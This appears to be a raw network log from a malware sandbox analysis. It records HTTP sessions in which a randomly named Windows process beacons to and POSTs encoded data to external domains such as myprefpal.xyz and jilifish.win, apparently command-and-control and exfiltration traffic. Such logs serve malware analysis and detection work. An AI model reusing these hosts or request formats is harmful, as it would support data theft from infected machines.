                                                                          6192.168.2.2249168185.196.10.234801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:01:57.699842930 CEST419OUTGET /quvp/?2PV85pl=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&DtMH=kxoTeT1hyx HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.75e296qdx.top
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Oct 22, 2024 15:01:58.771230936 CEST323INHTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:58 GMT
                                                                          content-type: text/html
                                                                          content-length: 150
                                                                          x-powered-by: PHP/7.2.30
                                                                          connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.22491693.33.130.190801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:03.923171043 CEST2472OUTPOST /2xrt/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 2164
                                                                          Host: www.myprefpal.xyz
                                                                          Origin: http://www.myprefpal.xyz
                                                                          Referer: http://www.myprefpal.xyz/2xrt/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 39 4c 41 67 6c 36 6d 6b 35 54 52 4e 6c 47 50 65 50 70 4b 37 6d 58 37 59 4f 52 77 71 2b 73 51 6f 49 46 52 77 76 33 45 70 2b 54 48 7a 6a 71 54 58 56 79 4e 66 33 4c 41 39 67 6c 79 4e 2f 5a 48 4e 35 34 65 65 72 4c 58 47 71 65 45 4e 2b 53 71 73 54 76 4a 61 48 34 32 72 67 39 63 4e 2f 39 6a 75 75 41 41 58 46 2b 6e 70 4a 61 67 6b 4b 43 34 45 4b 76 54 2f 59 36 6b 44 2b 44 46 4e 61 53 6e 42 59 41 69 73 62 6a 47 53 2b 45 36 72 49 73 55 30 6d 64 74 51 51 30 6e 5a 52 6e 7a 78 75 53 32 45 2b 61 7a 67 67 75 30 74 66 66 54 49 55 41 5a 57 6a 36 54 39 4e 48 50 65 64 30 78 73 31 36 59 37 4c 69 6c 65 4d 72 72 4c 6c 68 4b 57 64 52 74 42 75 52 6a 7a 30 31 6b 51 75 39 49 56 65 4b 45 64 5a 57 4e 45 77 70 38 59 67 69 38 32 50 6a 69 6a 51 56 45 6e 4a 51 53 57 63 65 73 49 36 72 4a 6c 75 5a 4f 67 67 50 6b 48 31 56 5a 71 36 59 63 58 4f 49 54 7a 4e 4e 75 74 31 54 39 47 4e 42 76 38 36 35 44 61 4d 42 57 63 6b 55 6d 7a 6f 4e 62 61 62 35 51 72 49 4a 58 4e 51 42 75 76 4d [TRUNCATED]
                                                                          Data Ascii: 2PV85pl=g+4Fv7u7yXiKo9LAgl6mk5TRNlGPePpK7mX7YORwq+sQoIFRwv3Ep+THzjqTXVyNf3LA9glyN/ZHN54eerLXGqeEN+SqsTvJaH42rg9cN/9juuAAXF+npJagkKC4EKvT/Y6kD+DFNaSnBYAisbjGS+E6rIsU0mdtQQ0nZRnzxuS2E+azggu0tffTIUAZWj6T9NHPed0xs16Y7LileMrrLlhKWdRtBuRjz01kQu9IVeKEdZWNEwp8Ygi82PjijQVEnJQSWcesI6rJluZOggPkH1VZq6YcXOITzNNut1T9GNBv865DaMBWckUmzoNbab5QrIJXNQBuvMGZLePJ6olszeLugJN667KK2lQtDPRgwLqB1UzInHEhq153Q5dkzqj1AW++w2QtebqhJSh5RJLH2SQK3PC8bQ07D1biF1hm9bfZ+PcJGQh/blz5/mIwjJ0nAvKIetV7Gph+n49wb+sZhgILDsR5ijWUtYe6ltauVzjNzRqRXJ8LCmLOBx9DLTaSRL6UwzdAxHOdZP+/qWqvfuGBmJSsY9kdfdqjVk3o9zJEIBie6KxSySVCKAliPiL95WByhC6hk5dBvvz65Pe53lC23yvhgC5iK8iDuV55UUqcAGEE3oW5LrERBxHUQNrZnO0sLD770GdoO0+WB+Sm4SlNiADjtToIukF1ir9Aic5+45uw0AYo/gMKqzK9rOwpjHqkzY888Y55kqk92ZCuu55KBCGk2ncMvtS87qOL4cjvNEXvzFinYxUxf/DKR3DC6W23/N3nr33HAaVP0Kj55FWsaEtF/t/KcUZVxwoDcU//3FhCdEqVZLNsiJnL1+Ed9oYJ73O9KXRUIvAoMAbSh7IjlnSyp8Y4sLEEmU2Hvq4k7WJhhfUk6Jq0py3jEaihrOWktJp6zzHJEJGGZmcDryjsKFDihGa9W471iOGYxvcUjNN0LN/BlDmCgvRKaa0ty1DnFZoa+eGL/GjWyHxH92QQuNT2kFwJcH6etz9S2DOm [TRUNCATED]
                                                                          Oct 22, 2024 15:02:03.929507971 CEST166OUTData Raw: 2b 37 72 33 72 79 6a 4d 73 2f 54 55 49 48 7a 4a 37 39 48 77 72 6d 54 6f 69 70 79 30 70 57 72 62 45 61 64 6a 4c 72 79 43 46 77 65 37 44 38 59 41 31 4c 4c 48 2b 65 79 76 51 2f 4b 33 61 2b 76 76 43 2b 6e 52 4c 38 63 56 79 79 6c 67 70 64 76 72 7a 50
                                                                          Data Ascii: +7r3ryjMs/TUIHzJ79HwrmToipy0pWrbEadjLryCFwe7D8YA1LLH+eyvQ/K3a+vvC+nRL8cVyylgpdvrzPFtZ/aSEE0lvmzh89opi/qK0b5mP7vE2JB9XzUTpE0URVOMv7ZMyIClzeuD/YR1xTbN+fPWveWccAL/h50ChM


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.22491703.33.130.190801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:06.471586943 CEST677OUTPOST /2xrt/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 204
                                                                          Host: www.myprefpal.xyz
                                                                          Origin: http://www.myprefpal.xyz
                                                                          Referer: http://www.myprefpal.xyz/2xrt/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 36 6e 41 68 30 36 6d 72 35 54 52 4f 6c 47 50 58 76 70 49 37 6d 4b 52 59 50 6c 67 71 4a 49 51 6f 64 35 52 77 39 76 45 6f 2b 54 41 37 44 71 58 4b 6c 7a 51 66 33 4c 71 39 6c 64 79 4e 2b 39 48 4e 63 30 65 63 71 4c 51 4a 36 65 4b 41 65 53 52 73 54 6a 54 61 48 39 39 72 67 56 63 4e 39 5a 6a 76 71 63 41 63 42 65 6e 37 4a 61 6d 6f 61 43 56 45 4b 72 4b 2f 59 4b 37 44 39 6e 46 4e 50 4b 6e 43 4e 30 69 70 4d 66 47 45 4f 45 37 78 34 74 37 6c 45 49 6e 49 51 67 35 55 6e 2b 49 32 2f 75 37 49 74 36 6c 70 32 53 75 6b 4d 4c 37 4f 79 78 79 63 68 76 4a 72 67 3d 3d
                                                                          Data Ascii: 2PV85pl=g+4Fv7u7yXiKo6nAh06mr5TROlGPXvpI7mKRYPlgqJIQod5Rw9vEo+TA7DqXKlzQf3Lq9ldyN+9HNc0ecqLQJ6eKAeSRsTjTaH99rgVcN9ZjvqcAcBen7JamoaCVEKrK/YK7D9nFNPKnCN0ipMfGEOE7x4t7lEInIQg5Un+I2/u7It6lp2SukML7OyxychvJrg==


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.22491713.33.130.190801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:09.019007921 CEST2472OUTPOST /2xrt/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 3628
                                                                          Host: www.myprefpal.xyz
                                                                          Origin: http://www.myprefpal.xyz
                                                                          Referer: http://www.myprefpal.xyz/2xrt/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 61 33 41 6d 54 75 6d 6a 35 54 4f 42 46 47 50 65 50 70 4d 37 6d 57 52 59 4f 52 77 71 37 45 51 6f 4b 64 52 31 76 33 45 71 2b 54 41 39 44 71 54 58 56 79 53 66 30 33 75 39 67 68 69 4e 38 78 48 4e 39 6b 65 65 6f 6a 58 42 71 65 45 45 65 53 53 73 54 6a 6a 61 44 5a 78 72 67 41 78 4e 39 52 6a 76 63 49 41 55 52 65 67 6e 5a 61 6d 6f 61 43 5a 45 4b 71 70 2f 59 44 38 44 2f 58 56 4e 64 69 6e 43 6f 41 69 71 72 6a 46 51 2b 45 2f 76 49 73 61 30 6d 42 63 51 51 30 6a 5a 56 4f 37 78 75 4f 32 46 74 53 7a 67 6e 36 33 77 66 66 4d 47 30 41 5a 4a 54 36 64 39 4e 47 57 65 64 30 78 73 77 6d 59 36 62 69 6c 65 4f 54 30 50 6c 68 4b 59 39 52 61 50 4f 55 53 7a 30 68 5a 51 75 73 31 4a 35 53 45 65 63 43 4e 4f 51 70 38 51 77 69 2b 32 50 6a 76 70 77 55 76 6e 4a 49 61 57 59 44 72 49 36 72 4a 6c 73 52 4f 6b 79 6e 6b 52 56 56 5a 68 61 59 64 65 75 49 53 7a 4e 4a 59 74 30 58 39 47 4d 70 76 39 4e 56 44 4e 65 70 58 58 30 55 6c 69 34 4e 6a 4c 72 34 55 72 49 56 35 4e 51 59 4c 76 50 [TRUNCATED]
                                                                          Data Ascii: 2PV85pl=g+4Fv7u7yXiKoa3AmTumj5TOBFGPePpM7mWRYORwq7EQoKdR1v3Eq+TA9DqTXVySf03u9ghiN8xHN9keeojXBqeEEeSSsTjjaDZxrgAxN9RjvcIAURegnZamoaCZEKqp/YD8D/XVNdinCoAiqrjFQ+E/vIsa0mBcQQ0jZVO7xuO2FtSzgn63wffMG0AZJT6d9NGWed0xswmY6bileOT0PlhKY9RaPOUSz0hZQus1J5SEecCNOQp8Qwi+2PjvpwUvnJIaWYDrI6rJlsROkynkRVVZhaYdeuISzNJYt0X9GMpv9NVDNepXX0Uli4NjLr4UrIV5NQYLvPOZLc3JhJlswuLhppN+wbGO2mwHDPUXwJuB0AnIkBQmll5xV5cK4Kj5AVSUw2wtev+hIRp5be3ImiQNzPCrOA0VD1fEFwEj8qvZ4vcJWjZwEFy96mJltp0xAvK2epUMGZZ+n4NwcrwZhgIKGsR3rDS2tZi+lp7jVw7NyAaRXI8LImLOLR96FzaiRLuuwy1+x0ydauu/n0yvOeGDkJSpc9kqfZOjVhGv9zRELgie7rxS+yVGUwltPiLb5WV2hCqfk65Bvuz6oee57FCzxyvlxS5BK87euVFDUQ+cGWkE1d65KLETDxHUZtqEnOtXLHjr0D5oOFuWHeSl1ylClwDgnzpPukV1irxAicR+7KWwwxYoigME3jLghuMNjH6ozdcs8eh5ioc9hs2trJ5MTSGu8HcgvtS47uab4NDvNQXvg26oXxUyEvDdfXDi6WnS/IH3rEDHAblP0ZL55VWsaEta/t/OcUVGx1MpcU//lEhCeyeVNbNprpnqx+ET9oMv72mHKW9UI+goMAbRrrIgsHSxp8kPsLEqmUKHsY0k5AFhvcsk8pq0+C3gP6igrOWOtMBqzyHJeZmGMl4AiijpDlCgomW+W42oiPSY2Y8UlcN0L9/B5zmBvPQQebILy13dFcMz/raL+xHWwAlE1mQTgtTwkF1/cHyoty0v2CGm [TRUNCATED]
                                                                          Oct 22, 2024 15:02:09.024575949 CEST1630OUTData Raw: 50 47 72 6e 4c 79 6a 2b 55 2f 59 79 63 48 35 4a 37 38 4a 51 72 52 54 6f 75 42 79 30 34 48 72 61 55 67 63 52 6a 72 7a 79 46 77 61 2b 33 2f 63 41 30 41 4d 48 2b 70 79 76 51 54 4b 33 69 36 76 76 75 75 6e 54 72 38 63 58 71 79 6b 51 70 61 72 62 7a 4e
                                                                          Data Ascii: PGrnLyj+U/YycH5J78JQrRTouBy04HraUgcRjrzyFwa+3/cA0AMH+pyvQTK3i6vvuunTr8cXqykQparbzNJNZ5aS5Q0lnIzhs9oo+/rqkbuWP7w022IdXqZzlD0U4TQYjBOIetGWjX3jzHBnF8GOyqWUHues0vV7k2lFNMjAHWw4GmkweaHihzP0CCgPAx393d4wKd8YfM6eTA1pKRfOyTXnGttQCE18b5fVo1gcAqWjdJnHB27


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.22491723.33.130.190801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:11.558645964 CEST419OUTGET /2xrt/?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.myprefpal.xyz
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Oct 22, 2024 15:02:12.179976940 CEST403INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 22 Oct 2024 13:02:12 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 263
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 50 56 38 35 70 6c 3d 74 38 51 6c 73 4c 66 2f 68 53 61 6f 35 4f 66 54 6a 47 58 79 76 4f 33 53 45 33 65 67 52 63 5a 4e 2f 30 57 59 47 75 74 71 34 5a 77 33 67 5a 39 70 77 74 66 71 70 64 37 54 78 69 65 37 41 55 4b 57 4d 56 33 41 68 46 74 43 47 72 5a 30 50 63 52 32 4e 74 4c 30 45 72 6d 37 45 37 71 51 6d 43 48 31 63 7a 5a 7a 68 69 30 73 44 2b 64 6c 6e 4f 34 67 61 7a 2b 48 72 4a 65 2b 76 39 37 68 26 44 74 4d 48 3d 6b 78 6f 54 65 54 31 68 79 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.224917315.197.148.33801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:17.239753962 CEST2472OUTPOST /to3j/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 2164
                                                                          Host: www.jilifish.win
                                                                          Origin: http://www.jilifish.win
                                                                          Referer: http://www.jilifish.win/to3j/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 75 43 42 6c 6f 4f 53 41 44 58 75 61 34 66 77 34 59 32 35 68 4d 6f 39 38 6c 43 6b 6c 38 4d 39 41 76 2f 70 48 68 71 46 76 2b 78 2b 51 65 53 79 49 2b 6c 65 2b 4a 47 55 34 65 76 35 57 6f 32 30 62 69 66 61 5a 47 4d 79 66 63 56 53 36 50 6b 68 68 32 52 33 55 57 4b 47 72 53 50 53 70 64 72 65 33 30 6e 6c 72 79 31 58 51 65 69 5a 49 79 38 49 54 53 77 33 42 78 49 49 39 49 39 65 30 46 31 62 55 4a 58 4a 30 76 42 38 73 39 74 4e 72 58 48 38 54 2f 6a 63 70 66 4f 57 70 6d 44 59 30 44 57 75 31 4f 6d 34 42 4e 4a 32 2f 4a 4a 31 69 51 64 4e 6b 55 58 52 41 30 67 33 76 4e 37 66 62 36 51 42 38 49 30 6f 44 41 57 30 37 50 66 4c 50 38 36 35 4e 6d 4b 70 69 63 53 58 73 57 70 4e 74 7a 66 47 7a 37 4f 4d 66 66 48 71 47 51 4d 59 48 6b 63 52 61 49 4e 68 52 54 57 79 41 53 64 4d 41 48 41 76 59 4c 67 71 54 50 2f 62 61 64 69 54 7a 64 64 33 4b 2b 52 67 51 63 77 6b 5a 2b 42 72 57 45 65 53 4b 62 37 76 73 57 50 57 6c 55 41 74 4e 6f 45 72 58 2f 44 37 53 73 4d 35 4d 4c 52 7a 37 42 4e 75 52 37 59 4e 2b 76 74 63 4d 39 79 [TRUNCATED]
                                                                          Data Ascii: 2PV85pl=uCBloOSADXua4fw4Y25hMo98lCkl8M9Av/pHhqFv+x+QeSyI+le+JGU4ev5Wo20bifaZGMyfcVS6Pkhh2R3UWKGrSPSpdre30nlry1XQeiZIy8ITSw3BxII9I9e0F1bUJXJ0vB8s9tNrXH8T/jcpfOWpmDY0DWu1Om4BNJ2/JJ1iQdNkUXRA0g3vN7fb6QB8I0oDAW07PfLP865NmKpicSXsWpNtzfGz7OMffHqGQMYHkcRaINhRTWyASdMAHAvYLgqTP/badiTzdd3K+RgQcwkZ+BrWEeSKb7vsWPWlUAtNoErX/D7SsM5MLRz7BNuR7YN+vtcM9yY+rLUa49XjhWPQ7QPKmHKjxa1Y/IkicnBgKvQoRu0VKxm3N5jOL8tQDz365b+PmRdjyB1O+55TmO5BLMQYVEXxD0IQRHVtGD8gGz3fVPzbTVsZWzyUIs+8oSPG0wWwnTPPGs0C3kYOjn8ZqSHNWHU4/s/NXUvuIJI5B4xI3QRzkbhTvAqd59EBBnHkPMUPyCmV5nQPXWwNSyQT79QcWp3/KHztwPwTmsZ3jTi2U4ZK0wdiWoa+HlKAitDYzex99yv/L3Zx8O8nQ1V6T8fBoaoINoSHO7B13JrRtx0sfVrryfiJgCmdnhqLLWZ2PbvNPQuK4OC74r1HeRP7suaEnObEeWK3507dDji8izSN1pdsnIQx9c0s+Mxde8ncEdrou+yEZ7VsjxRxeLFgczQgBTvkZh2KUBxnKmYw4aPNu+DRme9dpa3fi96kFrqlMMYP5Ezx9Xhn2hswFBp/e7ogF0bZ1M6avEsPWJo+xi4Ej9Hgl4p3BM77syhgl/4JbyMhh1BiU+GQ6J4ingBQnGIregV2sreb/e7Y9TvsRGkMBY88NvVl8g4CRZe6FvnI5EpRWZ5nkJD4Wk+jFc8hkWI+qp/cKTjZ7nQBYhgU4neuYNf0+2WnAnRwpUqGP6MPs6I/5kB8WrGxr0xTnN9BeXSgSTGsC3+pQmaull6B [TRUNCATED]
                                                                          Oct 22, 2024 15:02:17.245318890 CEST163OUTData Raw: 72 39 6f 77 37 78 66 34 31 54 48 47 62 6f 6e 6f 44 66 52 57 72 74 38 79 62 6c 36 4d 51 66 73 4a 66 5a 72 79 70 61 2b 36 68 31 63 6d 57 4f 51 57 45 37 73 4e 4c 76 73 4c 41 73 79 4a 38 74 55 7a 38 45 2f 68 73 33 56 6a 59 4e 74 33 69 77 52 65 6e 50
                                                                          Data Ascii: r9ow7xf41THGbonoDfRWrt8ybl6MQfsJfZrypa+6h1cmWOQWE7sNLvsLAsyJ8tUz8E/hs3VjYNt3iwRenPHYidQEtD9M1l3zj9qVCmohnqS8a+Lu0NxxxpzUg183uFs7vjSaL3UGZxDIlFRMziZaK4yksrRmeSI6G1f


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.224917415.197.148.33801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:19.776103020 CEST674OUTPOST /to3j/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 204
                                                                          Host: www.jilifish.win
                                                                          Origin: http://www.jilifish.win
                                                                          Referer: http://www.jilifish.win/to3j/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 75 43 42 6c 6f 4f 53 41 44 58 75 61 34 65 77 34 65 6e 35 68 4e 49 39 38 6d 43 6b 6c 33 73 39 47 76 2f 73 34 68 76 6b 79 39 41 32 51 65 44 43 49 2b 51 79 2b 4f 47 55 6e 55 50 35 4e 6d 57 30 4f 69 66 61 46 47 4a 4b 66 63 56 47 36 50 42 6c 68 77 56 6a 4c 66 61 47 70 61 76 53 30 64 72 61 55 30 6e 35 37 79 31 2f 51 65 68 4e 49 7a 38 59 54 43 69 66 42 36 59 49 37 4b 39 65 6a 46 31 58 42 4a 58 59 59 76 42 6f 73 39 2f 35 72 58 56 30 54 7a 51 30 70 55 75 57 71 72 6a 5a 57 53 44 4b 34 41 6d 51 72 52 61 2b 69 50 61 4a 54 58 4f 74 6b 55 6c 52 31 2f 55 54 41 50 50 2f 45 2b 53 64 35 56 77 3d 3d
                                                                          Data Ascii: 2PV85pl=uCBloOSADXua4ew4en5hNI98mCkl3s9Gv/s4hvky9A2QeDCI+Qy+OGUnUP5NmW0OifaFGJKfcVG6PBlhwVjLfaGpavS0draU0n57y1/QehNIz8YTCifB6YI7K9ejF1XBJXYYvBos9/5rXV0TzQ0pUuWqrjZWSDK4AmQrRa+iPaJTXOtkUlR1/UTAPP/E+Sd5Vw==


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.224917515.197.148.33801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:22.326925993 CEST2472OUTPOST /to3j/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 3628
                                                                          Host: www.jilifish.win
                                                                          Origin: http://www.jilifish.win
                                                                          Referer: http://www.jilifish.win/to3j/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 75 43 42 6c 6f 4f 53 41 44 58 75 61 33 64 34 34 63 45 52 68 45 49 38 4f 70 69 6b 6c 38 4d 39 43 76 2f 6f 34 68 71 46 76 2b 30 53 51 65 51 4b 49 2f 31 65 2b 49 47 55 6e 41 2f 35 57 6f 32 30 55 69 62 79 4a 47 4d 4f 6c 63 57 71 36 50 6d 4a 68 32 57 62 55 58 4b 47 72 51 50 53 33 64 72 61 42 30 6b 52 33 79 30 4c 36 65 68 56 49 79 4f 77 54 56 69 66 43 2f 59 49 37 4b 39 65 52 46 31 58 70 4a 57 77 70 76 46 38 38 39 74 68 72 57 33 38 54 2b 54 63 71 41 65 57 78 31 54 59 2b 44 57 72 48 4f 6d 34 46 4e 4a 69 46 4a 4a 70 69 53 4f 46 6b 55 55 4a 44 37 51 33 67 51 4c 66 62 2b 51 42 70 49 30 70 53 41 57 30 37 50 66 33 50 38 71 35 4e 6d 50 64 6c 53 79 58 73 66 4a 4e 67 38 2f 4b 4a 37 4f 49 69 66 47 36 57 51 2f 30 48 6c 66 70 61 4e 39 68 52 56 6d 79 47 53 64 4d 42 52 77 76 36 4c 6b 47 78 50 2f 4c 4b 64 69 54 7a 64 59 6a 4b 79 69 59 51 4d 51 6b 5a 6a 52 72 54 53 75 53 4a 62 37 62 4f 57 50 53 6c 55 41 46 4e 6e 56 48 58 35 46 48 52 6a 63 35 4e 63 42 7a 35 4c 74 75 45 37 59 52 51 76 74 55 71 39 32 [TRUNCATED]
